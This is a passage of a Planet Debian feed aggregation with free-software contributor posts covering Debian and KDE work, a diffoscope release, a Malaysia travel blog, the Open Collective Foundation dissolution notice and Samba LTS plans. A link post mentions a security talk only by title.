<a href="https://github.com/collab-qa/check-all-the-things/commit/d39bd1e7458fddce06948626d3c68df9bde990bf">update dep</a></li>
<li>Debian reportbug:
<a href="https://salsa.debian.org/reportbug-team/reportbug/-/merge_requests/91">allow defaults for multi-select menus</a></li>
<li>Debian release website:
<a href="https://salsa.debian.org/release-team/release.debian.org/-/merge_requests/23">link arch policy from arch qualification</a></li>
<li>Debian BTS usertags:
fix porter, reproducible, release tags</li>
<li>Debian wiki pages:
<a href="https://wiki.debian.org/attachement%3Aroot-system-build.sh?action=diff&rev1=1&rev2=2">attachement:root-system-build.sh</a>,
<a href="https://wiki.debian.org/attachement%3Aroot-system-changes.sh?action=diff&rev1=1&rev2=2">attachement:root-system-changes.sh</a>,
<a href="https://wiki.debian.org/DebianScience/ROOT?action=diff&rev1=66&rev2=67">DebianScience/ROOT</a>,
<a href="https://wiki.debian.org/Games/GameDataPackager?action=diff&rev1=28&rev2=29">Games/GameDataPackager</a>,
<a href="https://wiki.debian.org/PortsDocs/New?action=diff&rev1=111&rev2=112">PortsDocs/New</a></li>
</ul>
<h1 id="issues">Issues</h1>
<ul>
<li>Crashes in
<a href="https://bugs.debian.org/1063825">ognibuild</a></li>
<li>Warnings in
<a href="https://bugs.debian.org/1063826">python3-binwalk</a>,
<a href="https://bugs.debian.org/1063330">python3-extruct</a>,
<a href="https://bugs.debian.org/1064209">offpunk</a></li>
<li>Conversion missed in
<a href="https://bugs.debian.org/1064341">colorized-logs</a></li>
<li>Features in
<a href="https://bugs.debian.org/1063650">reportbug</a>,
<a href="https://gitlab.softwareheritage.org/swh/devel/swh-web/-/issues/4790">swh-web</a></li>
<li>Conffile removal needed in
<a href="https://bugs.debian.org/1064877">fwupd</a></li>
<li>Expired cert in
<a href="https://bugs.debian.org/1063093">ca-certificates</a></li>
</ul>
<h1 id="review">Review</h1>
<ul>
<li>Spam: reported
1 Debian bug report</li>
<li>Debian BTS usertags:
changes for the month</li>
</ul>
<h1 id="administration">Administration</h1>
<ul>
<li>Debian BTS:
unarchive/reopen/triage bugs for reintroduced packages:
ovito,
tahoe-lafs,
tpm2-tss-engine</li>
<li>Debian wiki:
produce HTML dump for a user,
unblock IP addresses,
approve accounts</li>
</ul>
<h1 id="communication">Communication</h1>
<ul>
<li>Respond to queries from Debian users and contributors on the mailing lists and IRC</li>
</ul>
<h1 id="sponsors">Sponsors</h1>
<p>The SWH work was sponsored.
All other work was done on a volunteer basis.</p>2024-03-03T07:52:36+00:00Paul WiseRavi Dwivedi: Malaysia Trip
https://ravidwivedi.in/posts/malaysia-trip/
<p>Last month, I had a trip to Malaysia and Thailand. I stayed for six days in each of the countries. The selection of these countries was due to both of them granting <a href="https://www.thehindu.com/news/national/malaysia-joins-thailand-and-sri-lanka-in-granting-visa-free-entry-for-indians/article67579107.ece">visa-free entry</a> to Indian tourists for some time window. This post covers the Malaysia part and Thailand part will be covered in the next post. If you want to travel to any of these countries in the visa-free time period, I have written all the questions asked during immigration and at airports during this trip <a href="https://cryptpad.fr/pad/#/2/pad/view/kTHYSSxU8DzTSdetdrgdebcVDsjTAlThSbC52QcZgx8/">here</a> which might be of help.</p>
<p>I mostly stayed in Kuala Lumpur and went to places around it. Although before the trip, I planned to visit Ipoh and Cameron Highlands too, but could not cover it during the trip. I found planning a trip to Malaysia a little difficult. The country is divided into two main islands - Peninsular Malaysia and Borneo. Then there are more islands - Langkawi, Penang island, Perhentian and Redang Islands. Reaching those islands seemed a little difficult to plan and I wish to visit more places in my next Malaysia trip.</p>
<p>My first day hostel was booked in Chinatown part of Kuala Lumpur, near Pasar Seni LRT station. As soon as I checked-in and entered my room, I met another Indian named Fletcher, and after that we accompanied each other in the trip. That day, we went to Muzium Negara and Little India. I realized that if you know the right places to buy what you want, Malaysia could be quite cheap. Malaysian currency is Malaysian Ringgit (MYR). 1 MYR is equal to 18 INR. For 2 MYR, you can get a good masala tea in Little India and it costs like 4-5 MYR for a masala dosa. The vegetarian food has good availability in Kuala Lumpur, thanks to the Tamil community. I also tried <a href="https://en.wikipedia.org/wiki/Mee_goreng">Mee Goreng</a>, which was vegetarian, and I found it fine in terms of taste. When I checked about Mee Goreng on Wikipedia, I found out that it is unique to Indian immigrants in Malaysia (and neighboring countries) but you don’t get it in India!</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/mee-goreng.jpg" width="500" />
<h4>Mee Goreng, a dish made of noodles in Malaysia.</h4>
</figure>
<p>For the next day, Fletcher had planned a trip to Genting Highlands and pre booked everything. I also planned to join him but when we went to KL Sentral to take the bus, his bus tickets were sold out. I could take a bus at a different time, but decided to visit some other place for the day and cover Genting Highlands later. At the ticket counter, I met a family from Delhi and they wanted to go to Genting Highlands but due to not getting bus tickets for that day, they decided to buy a ticket for the next day and instead planned for Batu Caves that day. I joined them and went to Batu Caves.</p>
<p>After returning from Batu Caves, we went our separate ways. I went back and took rest at my hostel and later went to Petronas Towers at night. Petronas Towers is the icon of Kuala Lumpur. Having a photo there was a must. I was at Petronas Towers at around 9 PM. Around that time, Fletcher came back from Genting Highlands and we planned to meet at KL Sentral to head for dinner.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/me-at-petronas-towers.jpg" width="400" />
<h4>Me at Petronas Towers.</h4>
</figure>
<p>We went back to the same place as the day before where I had Mee Goreng. This time we had dosa and a masala tea. Their masala tea from the last day was tasty and that’s why I was looking for them in the first place. We also met a Malaysian family having Indian ancestry dining there and had a nice conversation. Then we went to a place to eat roti canai in Pasar Seni market. Roti canai is a popular non-vegetarian dish in Malaysia but I took the vegetarian version.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/photo-with-malaysians.jpg" width="500" />
<h4>Photo with Malaysians.</h4>
</figure>
<p>The next day, we went to Berjaya Time Square shopping place which sells pretty cheap items for daily use and souveniers too. However, I bought souveniers from Petaling Street, which is in Chinatown. At night, we explored Bukit Bintang, which is the heart of Kuala Lumpur and is famous for its nightlife.</p>
<p>After that, Fletcher went to Bangkok and I was in Malaysia for two more days. Next day, I went to Genting Highlands and took the cable car, which had awesome views. I came back to Kuala Lumpur by the night. The remaining day I just roamed around in Bukit Bintang. Then I took a flight for Bangkok on 7th Feb, which I will cover in the next post.</p>
<p>In Malaysia, I met so many people from different countries - apart from people from Indian subcontinent, I met Syrians, Indonesians (Malaysia seems to be a popular destination for Indonesian tourists) and Burmese people. Meeting people from other cultures is an integral part of travel for me.</p>
<p>My expenses for Food + Accommodation + Travel added to 10,000 INR for a week in Malaysia, while flight costs were: 13,000 INR (Delhi to Kuala Lumpur) + 10,000 INR (Kuala Lumpur to Bangkok) + 12,000 INR (Bangkok to Delhi).</p>
<p>For OpenStreetMap users, good news is Kuala Lumpur is fairly well-mapped on <a href="https://openstreetmap.org">OpenStreetMap</a>.</p>
<h2 id="tips">Tips</h2>
<ul>
<li>
<p>I bought local SIM from a shop at KL Sentral station complex which had “news” in their name (I forgot the exact name and there are two shops having “news” in their name) and it was the cheapest option I could find. The SIM was 10 MYR for 5 GB data for a week. If you want to make calls too, then you need to spend extra 5 MYR.</p>
</li>
<li>
<p>7-Eleven and KK Mart convenience stores are everywhere in the city and they are open all the time (24 hours a day). If you are a vegetarian, you can at least get some bread and cheese from there to eat.</p>
</li>
<li>
<p>A lot of people know English (and many - Indians, Pakistanis, Nepalis - know Hindi) in Kuala Lumpur, so I had no language problems most of the time.</p>
</li>
<li>
<p>For shopping on budget, you can go to <a href="https://en.wikipedia.org/wiki/Petaling_Street">Petaling Street</a>, Berjaya Time Square or Bukit Bintang. In particular, there is a shop named I Love KL Gifts in Bukit Bintang which had very good prices. just near the metro/monorail stattion. Check out location of the shop on <a href="https://www.openstreetmap.org/#map=18/3.1463105/101.7110948">OpenStreetMap</a>.</p>
</li>
</ul>2024-03-02T13:59:59+00:00Ravi DwivediGuido Günther: Free Software Activities February 2024
https://honk.sigxcpu.org/con/Free_Software_Activities_February_2024.html
<p>A short status update what happened last month. Work in progress is marked as WiP:</p>
<h2>GNOME Calls</h2>
<ul>
<li>Landed support to pick emergency calls numbers based on location (until now Calls picked
the numbers from the SIM card only): <a href="https://gitlab.gnome.org/GNOME/calls/-/merge_requests/705">Merge Request</a></li>
<li>Bugfix: Fix dial back - the action mistakenly got disabled in some circumstances:
<a href="https://gitlab.gnome.org/GNOME/calls/-/merge_requests/719">Merge Request</a>, <a href="https://gitlab.gnome.org/GNOME/calls/-/issues/601">Issue</a>.</li>
</ul>
<h2>Phosh and Phoc</h2>
<p>As this often overlaps I've put them in a common section:</p>
<ul>
<li>Prepare and release <a href="https://phosh.mobi/releases/rel-0.36.0/">Phosh 0.36.0</a> and upload to Debian</li>
<li>phoc: Implement always on top and allow to move to corners via keybindings:
<a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/536">Merge Request</a>, <a href="https://social.librem.one/@agx/111936533547643050">Demo</a></li>
<li>phoc: Wire up support for fractional-scale-v1 protocol:
<a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/539">Merge Request</a>. <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/issues/345">Issue</a></li>
<li>phoc: Go with the flow and don't use APIs that will be removed in wlroots 0.18, thus
switch to render pass: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/533">Merge Request</a></li>
<li>phoc (as art of my ongoing cleanups to make the code base more approachable):
<ul>
<li>Make PhocServer private: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/535">Merge Request</a></li>
<li>Move drag-icon handling into it's own file: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/541">Merge Request</a></li>
</ul></li>
<li>phosh: load backgrounds asynd and handle dark theme URIs:
<a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1356">Merge Request</a></li>
<li>WiP: Allow to use wallpapers in lock screen and overview:
<a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/537">Merge Request 1</a>,
<a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1262">Merge Request 2</a>,
<a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1250">Merge Request 3</a></li>
<li>phosh: Add a caffeine quick-setting: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1373">Merge Request</a>, <a href="https://fosstodon.org/@phosh/111991537708416027">Demo</a></li>
<li>phosh and phoc bug fixes
<ul>
<li>Fix Maximized map of X11 surfaces: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/540">Merge Request</a></li>
<li>vpn fix: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1375">Merge Request</a></li>
<li>Fix crash around emergency calls: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1369">Merge Request</a></li>
<li>Honor disabled locking when there's no lock delay: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1371">Merge Request</a></li>
</ul></li>
<li>Testsuite improvements:
<ul>
<li>Speedup tests: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1365">Merge Request</a></li>
<li>Load plugins in tests: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1374">Merge Request</a></li>
</ul></li>
<li>release <a href="https://gitlab.gnome.org/World/Phosh/gmobile/-/releases/v0.0.6">gmobile 0.0.6</a></li>
</ul>
<h2>Phosh Tour</h2>
<ul>
<li>Allow for hardware specific pages: <a href="https://gitlab.gnome.org/guidog/phosh-tour/-/merge_requests/22">Merge Request</a></li>
<li>Catch up with library and CI improvements: <a href="https://gitlab.gnome.org/World/Phosh/phosh-tour/-/merge_requests/21">Merge Request</a></li>
</ul>
<h2>Phosh Mobile Settings</h2>
<ul>
<li>Filter lockscreen plugins on lockscreen page: <a href="https://gitlab.gnome.org/World/Phosh/phosh-mobile-settings/-/merge_requests/113">Merge Request</a></li>
</ul>
<h2>Phosh OSK Stub</h2>
<ul>
<li>Add OSK side workaround for splash timeouts until GTK side is merged: <a href="https://gitlab.gnome.org/guidog/phosh-osk-stub/-/merge_requests/129">Merge Request</a></li>
<li>Update emoji data: <a href="https://gitlab.gnome.org/guidog/phosh-osk-stub/-/merge_requests/128">Merge Request</a></li>
</ul>
<h2>Livi Video Player</h2>
<ul>
<li>Remember stream position: <a href="https://gitlab.gnome.org/guidog/livi/-/merge_requests/26">Merge Request</a></li>
<li>Label SDH subtitles: <a href="https://gitlab.gnome.org/guidog/livi/-/merge_requests/36">Merge Request</a></li>
<li>Show controls when window becomes active: <a href="https://gitlab.gnome.org/guidog/livi/-/merge_requests/37">Merge Request</a></li>
</ul>
<h2>Phosh.mobi Website</h2>
<ul>
<li>Directly link to tarballs from the release page, e.g. <a href="https://phosh.mobi/releases/rel-0.36.0/#phosh-0360-1">here</a></li>
</ul>
<p>If you want to support my work see <a href="https://honk.sigxcpu.org/piki/donations/">donations</a>.</p>2024-03-01T17:07:00+00:00Guido GüntherScarlett Gately Moore: Kubuntu: Week 4, Feature Freeze and what comes next.
https://www.scarlettgatelymoore.dev/kubuntu-week-4-feature-freeze-and-what-comes-next/
<div class="wp-block-image">
<figure class="aligncenter size-full"><img alt="" class="has-transparency wp-image-420" height="246" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/face.png" width="246" /></figure></div>
<p>First I would like to give a big congratulations to <a href="https://kde.org">KDE</a> for a superb <a href="https://kde.org/announcements/megarelease/6/">KDE 6 mega release</a> <img alt="🙂" class="wp-smiley" src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" style="height: 1em;" /> While we couldn’t go with 6 on our upcoming LTS release, I do recommend <a href="https://neon.kde.org/">KDE neon</a> if you want to give it a try! I want to say it again, I firmly stand by the Kubuntu Council in the decision to stay with the rock solid Plasma 5 for the 24.04 LTS release. The timing was just to close to feature freeze and the last time we went with the shiny new stuff on an LTS release, it was a nightmare ( KDE 4 anyone? ). So without further ado, my weekly wrap-up.</p>
<p><strong>Kubuntu:</strong></p>
<p>Continuing efforts from last week <a href="https://www.scarlettgatelymoore.dev/kubuntu-week-3-wrap-up-contest-kde-snaps-debian-uploads/">Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads.</a> , it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11 as it is a bug fix release <img alt="🙂" class="wp-smiley" src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" style="height: 1em;" /> and right now it is all about the finding and fixing bugs! Aside from many uploads my accomplishments this week are:</p>
<ul>
<li>Kept a close eye on <a href="https://ubuntu-archive-team.ubuntu.com/proposed-migration/noble/update_excuses.html">Excuses</a> and fixed tests as needed. Seems riscv64 tests were turned off by default which broke several of our builds.</li>
<li>I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following <a href="https://community.kde.org/Distributions/Packaging_Recommendations">KDE packaging recommendations</a>. Unfortunately, we cannot ship maliit-keyboard as we get hit by <a href="https://bugs.launchpad.net/ubuntu/+source/maliit-keyboard/+bug/2039721">LP 2039721</a> which makes for an unpleasant experience.</li>
<li>I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! <a href="https://kubuntu.org/news/kubuntu-graphic-design-contest/" rel="noreferrer noopener" target="_blank">https://kubuntu.org/news/kubuntu-graphic-design-contest/</a></li>
<li>Bug triage! Oh so many bugs! From back when I worked on Kubuntu 10 years ago and plasma5 was new.. I am triaging and reducing this list to more recent bugs ( which is a much smaller list ). This reaffirms our decision to go with a rock solid stable Plasma5 for this LTS release.</li>
<li>I spent some time debugging kio-gdrive which no longer works ( It works in Jammy ) so I am tracking down what is broken. I thought it was 2FA but my non 2FA doesn’t work either, it just repeatedly throws up the google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts all together, but I would prefer to give users the full experience.</li>
<li>Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon <img alt="🙂" class="wp-smiley" src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png" style="height: 1em;" /></li>
<li>Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.</li>
</ul>
<p>What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.</p>
<p><strong>Snaps:</strong></p>
<p>I have started the MRs to fix our latest 23.08.5 snaps, I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSOC ideas that I really like and will mentor, hopefully we are not too late.</p>
<p>Happy with my work? My continued employment depends on you! Please consider a donation <a href="http://kubuntu.org/donate">http://kubuntu.org/donate</a></p>
<p>Thank you!</p>2024-03-01T16:38:22+00:00sgmooreJunichi Uekawa: March.
http://www.netfort.gr.jp/~dancer/diary/daily/2024-Mar-1.html.en#2024-Mar-1-22:05:43
March. Busy days.
<p></p>2024-03-01T13:05:43+00:00Junichi UekawaRavi Dwivedi: Fixing Mobile Data issue on Lineage OS
https://ravidwivedi.in/posts/fix-internet-on-lineage-os/
<p>I have used Lineage OS on a couple of phones, but I noticed that internet using my mobile data was not working well on it. I am not sure why. This was the case in Xiaomi MI A2 and OnePlus 9 Pro phones. One day I met <a href="https://contrapunctus.codeberg.page/">contrapunctus</a> and they looked at their phone settings and used the same in mine and it worked. So, I am going to write here what worked for me.</p>
<p>The trick is to add an access point.</p>
<p>Go to Settings -> Network Settings -> Your SIM settings -> Access Point Names -> Click on ‘+’ symbol.</p>
<p>In the <code>Name</code> section, you can write anything, I wrote <code>test</code>. And in the <code>APN</code> section write <code>www</code>, then save. Below is a screenshot demonstrating the settings you have to change.</p>
<figure>
<img src="https://ravidwivedi.in/images/APN-screenshot.png" width="250" />
<center><h4>APN settings screenshot. Notice the circled entries.</h4></center>
</figure>
<p>This APN will show in the list of APNs and you need to select this one.</p>
<p>After this, my mobile data started working well and I started getting speeds according to my data plan. This is what worked for me in Lineage OS. Hopefully, it was of help to you :D</p>
<p>I will meet you in the next post.</p>2024-03-01T09:04:08+00:00Ravi DwivediReproducible Builds (diffoscope): diffoscope 259 released
https://diffoscope.org/news/diffoscope-259-released/
<p>The diffoscope maintainers are pleased to announce the release of diffoscope
version <code class="language-plaintext highlighter-rouge">259</code>. This version includes the following changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ Chris Lamb ]
* Don't error-out with a traceback if we encounter "struct.unpack"-related
errors when parsing .pyc files. (Closes: #1064973)
* Fix compatibility with PyTest 8.0. (Closes: reproducible-builds/diffoscope#365)
* Don't try and compare rdb_expected_diff on non-GNU systems as %p formatting
can vary. (Re: reproducible-builds/diffoscope#364)
</code></pre></div></div>
<p>You find out more by <a href="https://diffoscope.org">visiting the project homepage</a>.</p>2024-03-01T00:00:00+00:00Reproducible Builds (diffoscope)Russell Coker: Links February 2024
https://etbe.coker.com.au/2024/02/29/links-february-2024/
<p><a href="https://www.antipope.org/charlie/blog-static/2018/01/dude-you-broke-the-future.html">In 2018 Charles Stross wrote an insightful blog post Dude You Broke the Future [1]</a>. It covers AI in both fiction and fact and corporations (the real AIs) and the horrifying things they can do right now.</p>
<p><a href="https://longnow.org/ideas/magnum-opus/">LongNow has an interesting article about the concept of the Magnum Opus [2]</a>. As an aside I’ve been working on SE Linux for 22 years.</p>
<p><a href="https://locusmag.com/2023/11/commentary-by-cory-doctorow-dont-be-evil/">Cory Doctorow wrote an insightful article about the incentives for enshittification of the Internet and how economic issues and regulations shape that [3]</a>.</p>
<p><a href="https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers">CCC has a lot of great talks, and this talk from the latest CCC about the Triangulation talk on an attak on Kaspersky iPhones is particularly epic [4]</a>.</p>
<p><a href="https://marketplace.goodcar.co/cars">GoodCar is an online sales site for electric cars in Australia [5]</a>.</p>
<p><a href="https://the.curlybracket.net/2023/12/21/unpaid-work.html">Ulrike wrote an insightful blog post about how the reliance on volunteer work in the FOSS community hurts diversity [6]</a>.</p>
<p><a href="https://pluralistic.net/2023/10/21/the-internets-original-sin/">Cory Doctorow wrote an insightful article about The Internet’s Original Sin which is misuse of copyright law [7]</a>. He advocates for using copyright strictly for it’s intended purpose and creating other laws for privacy, labor rights, etc.</p>
<p><a href="https://www.davidbrin.com/nonfiction/neoteny1.html">David Brin wrote an interesting article on neoteny and sexual selection in humans [8]</a>.</p>
<p><a href="https://media.ccc.de/v/37c3-12047-software_licensing_for_a_circular_economy">37C3 has an interesting lecture about software licensing for a circular economy which includes environmental savings from better code [9]</a>. Now they track efficiency in KDE bug reports!</p>
<ul>
<li>[1]<a href="https://www.antipope.org/charlie/blog-static/2018/01/dude-you-broke-the-future.html"> http://tinyurl.com/2estdwk6</a></li>
<li>[2]<a href="https://longnow.org/ideas/magnum-opus/"> https://longnow.org/ideas/magnum-opus/</a></li>
<li>[3]<a href="https://locusmag.com/2023/11/commentary-by-cory-doctorow-dont-be-evil/"> http://tinyurl.com/ymngs25y</a></li>
<li>[4]<a href="https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers"> http://tinyurl.com/yum44rag</a></li>
<li>[5]<a href="https://marketplace.goodcar.co/cars"> https://marketplace.goodcar.co/cars</a></li>
<li>[6]<a href="https://the.curlybracket.net/2023/12/21/unpaid-work.html"> https://the.curlybracket.net/2023/12/21/unpaid-work.html</a></li>
<li>[7]<a href="https://pluralistic.net/2023/10/21/the-internets-original-sin/"> http://tinyurl.com/2ye7hl4g</a></li>
<li>[8]<a href="https://www.davidbrin.com/nonfiction/neoteny1.html"> https://www.davidbrin.com/nonfiction/neoteny1.html</a></li>
<li>[9]<a href="https://media.ccc.de/v/37c3-12047-software_licensing_for_a_circular_economy"> http://tinyurl.com/2c7mjw2z</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2024/01/28/links-january-2024/" rel="bookmark" title="Links January 2024">Links January 2024</a> <small>Long Now has an insightful article about domestication that considers...</small></li>
<li><a href="https://etbe.coker.com.au/2020/09/20/links-september-2020/" rel="bookmark" title="Links September 2020">Links September 2020</a> <small>MD5 cracker, find plain text that matches MD5 hash [1]....</small></li>
<li><a href="https://etbe.coker.com.au/2014/02/28/links-february-2014/" rel="bookmark" title="Links February 2014">Links February 2014</a> <small>The Economist has an interesting and informative article about the...</small></li>
</ol>
</div>2024-02-29T12:05:01+00:00etbeDaniel Lange: Opencollective shutting down
https://daniel-lange.com/archives/186-Opencollective-shutting-down.html
<p><strong>Update 28.02.2024 19:45 CET:</strong> There is now a blog entry at <a href="https://blog.opencollective.com/open-collective-official-statement-ocf-dissolution/">https://blog.opencollective.com/open-collective-official-statement-ocf-dissolution/</a> trying to discern the legal entities in the Open Collective ecosystem and recommending potential ways forward.</p>
<hr />
<p>Gee, there is nothing on <a href="https://blog.opencollective.com/">their blog</a> yet, but I just [28.02.2023 00:07 CET] received this email from Mike Strode, Program Officer at the Open Collective Foundation:</p>
<p>Dear Daniel Lange,</p>
<p>It is with a heavy heart that I'm writing today to inform you that the
Board of Directors of the Open Collective Foundation (OCF) has made the
difficult decision to dissolve OCF, effective December 31, 2024.</p>
<p>We are proud of the work we have been able to do together. We have been
honored to build community with you and the hundreds of other collectives
hosted at the Open Collective Foundation.</p>
<p><strong>What you need to know:</strong></p>
<p>We are beginning <strong>a staged dissolution process</strong> that will allow our over
600 collectives the time to close or transition their work. Dissolving OCF
will take many months, and involves settling all liabilities while spending
down all funds in a legally compliant manner.</p>
<p><strong>Our priority is to support our collectives in navigating this change.</strong> We
want to provide collectives the longest possible runway to wind down or
transition their operations while we focus on the many legal and financial
tasks associated with dissolving a nonprofit.</p>
<p><strong>March 15</strong> is the last day to accept donations. You will have until <strong>September 30</strong>
to work with us to develop and implement a plan to spend down the money
in your fund. Key dates are included at the bottom of this email.</p>
<p>We know this is going to be difficult, and we will do everything we can to
ease the transition for you.</p>
<p><strong>How we will support collectives:</strong></p>
<p>It remains our fiduciary responsibility to safeguard each collective's
charitable assets and ensure funds are used solely for specified charitable
purposes.</p>
<p>We will be providing assistance and support to you, whether you choose to
spend out and close down your collective or continue your work through
another 501(c)(3) organization or fiscal sponsor.</p>
<p>Unfortunately, we had to say goodbye to several of our colleagues today as
we pare down our core staff to reduce costs. I will be staying on staff to
support collectives through this transition, along with Wayne Kleppe, our
Finance Administrator.</p>
<p><strong>What led to this decision:</strong></p>
<p>From day one, OCF was committed to experimentation and innovation. We were
dedicated to finding new ways to open up the nonprofit space, making it
easier for people to raise and access funding so they can do good in their
communities.</p>
<p>OCF was created by Open Collective Inc. (OCI), a company formed in 2015
with the goal of "enabling groups to quickly set up a collective, raise
funds and manage them transparently." Soon after being founded by OCI, OCF
went through a period of rapid growth. We responded to increased demand
arising from the COVID-19 pandemic without taking the time to establish the
appropriate systems and infrastructure to sustain that growth.</p>
<p>Unfortunately, over the past year, we have learned that Open Collective
Foundation's business model is not sustainable with the number of complex
services we have offered and the fees we pay to the Open Collective Inc.
tech platform.</p>
<p>In late 2023, we made the decision to pause accepting new collectives in
order to create space for us to address the issues. Unfortunately, it
became clear that it would not be financially feasible to make the
necessary corrections, and we determined that OCF is not viable.</p>
<p><strong>What's next:</strong></p>
<p>We know this news will raise questions for many of our collectives. We will
be making space for questions and reactions in the coming weeks.</p>
<p>In the meantime, we have developed this FAQ which we will keep updated as
more questions come in.</p>
<p><strong>What you need to do next:</strong></p>
<ul>
<li>Review the FAQ</li>
<li>Discuss your options within your collective. Your options are:
<ul>
<li>spend down and close out your collective</li>
<li>spend down and transfer your collective to another fiscal sponsor,
or</li>
<li>transfer your collective and funds to another charitable
organization.</li>
</ul></li>
<li><strong>Reply-all</strong> to this email with any questions, requests, or to set up a
time to talk. Please make sure generalinquiries@opencollective.org is
copied on your email.</li>
</ul>
<p><strong>Dates to know:</strong></p>
<ul>
<li>Last day to accept funds/receive donations: March 15, 2024</li>
<li>Last day collectives can have employees: June 30, 2024</li>
<li>Last day to spend or transfer funds: September 30, 2024</li>
</ul>
<p>In Care & Accompaniment,<br />
Mike Strode<br />
<em>Program Officer</em><br />
<em>Open Collective Foundation</em></p>
<p><em>Our mailing address has changed! We are now located at 440 N. Barranca
Avenue #3717, Covina, CA 91723, USA</em></p>2024-02-28T07:45:00+00:00Daniel LangeAdnan Hodzic: App architecture with reliability in mind: From Kubernetes to Serverless with GCP Cloud Build & Cloud Run
https://foolcontrol.org/?p=4621
<p>The blog post you’re reading is hosted on a private Kubernetes cluster that runs inside my home. Another workload that’s running on same cluster is...</p>
<p>The post <a href="https://foolcontrol.org/?p=4621">App architecture with reliability in mind: From Kubernetes to Serverless with GCP Cloud Build & Cloud Run</a> appeared first on <a href="https://foolcontrol.org">FoolControl: Phear the penguin</a>.</p>2024-02-26T20:00:23+00:00Adnan HodzicSergio Durigan Junior: Planning to orphan Pagure on Debian
https://blog.sergiodj.net/posts/planning-to-orphan-pagure/
<p>I have been thinking more and more about orphaning the <a href="https://tracker.debian.org/pagure">Pagure Debian
package</a>. I don’t have the time to maintain it properly anymore, and
I have also lost interest in doing so.</p>
<h2 id="what-s-pagure">What’s Pagure</h2>
<p><a href="https://pagure.io/pagure">Pagure</a> is a git forge written entirely in Python using pygit2. It was
almost entirely developed by one person, Pierre-Yves Chibon. He is
(was?) a Red Hat employee and started working on this new git forge
almost 10 years ago because the company wanted to develop something
in-house for Fedora. The software is amazing and I admire Pierre-Yves
quite a lot for what he was able to achieve basically alone.
Unfortunately, a few years ago Fedora <a href="https://communityblog.fedoraproject.org/making-a-git-forge-decision/">decided</a> to move to Gitlab and
the Pagure development pretty much stalled.</p>
<h2 id="pagure-in-debian">Pagure in Debian</h2>
<p>Packaging Pagure for Debian was hard, but it was also very fun. I
learned quite a bit about many things (packaging and non-packaging
related), interacted with the upstream community, decided to dogfood
my own work and run my Pagure instance for a while, and tried to get
newcomers to help me with the package (without much success,
unfortunately).</p>
<p>I remember that when I had started to package Pagure, Debian was also
moving away from Alioth and discussing options. For a brief moment
Pagure was a contender, but in the end the community decided to
self-host Gitlab, and that’s why we have <a href="https://salsa.debian.org">Salsa</a> now. I feel like I
could have tipped the scales in favour of Pagure had I finished
packaging it for Debian before the decision was made, but then again,
to the best of my knowledge Salsa doesn’t use our Gitlab package
anyway…</p>
<h2 id="are-you-interested-in-maintaining-it">Are you interested in maintaining it?</h2>
<p>If you’re interested in maintaining the package, please get in touch
with me. I will happily pass the torch to someone else who is still
using the software and wants to keep it healthy in Debian. If there
is nobody interested, then I will just orphan it.</p>2024-02-26T03:23:00+00:00Sergio Durigan JuniorFreexian Collaborators: Long term support for Samba 4.17
https://www.freexian.com/blog/samba-4.17-lts/
<p>Freexian is pleased to announce a partnership with
<a href="https://www.catalyst.net.nz/samba-and-windows-integration">Catalyst</a> to extend
the security support of
Samba 4.17, which is the version packaged in Debian 12 Bookworm. Samba 4.17 will
reach upstream’s end-of-support this upcoming March (2024), and the goal of this
partnership is to extend it until June 2028 (i.e. the end of Debian 12’s
regular security support).</p>
<p>One of the main aspects of this project is that it will also include
support for Samba as Active Directory Domain Controller (AD-DC). Unfortunately,
support for Samba as AD-DC in
<a href="https://lists.debian.org/debian-security-announce/2023/msg00169.html">Debian 11 Bullseye</a>,
<a href="https://lists.debian.org/debian-security-announce/2021/msg00201.html">Debian 10 Buster</a>
and older releases has been discontinued before the end of the
life cycle of those Debian releases. So we really expect to improve the
situation of Samba in <em>Debian 12 Bookworm</em>, ensuring full support during the 5
years of regular security support.</p>
<p>We would like to mention that this is an experiment, and we will
do our best to make it a success, and to try to continue it for Samba versions
included in future Debian releases.</p>
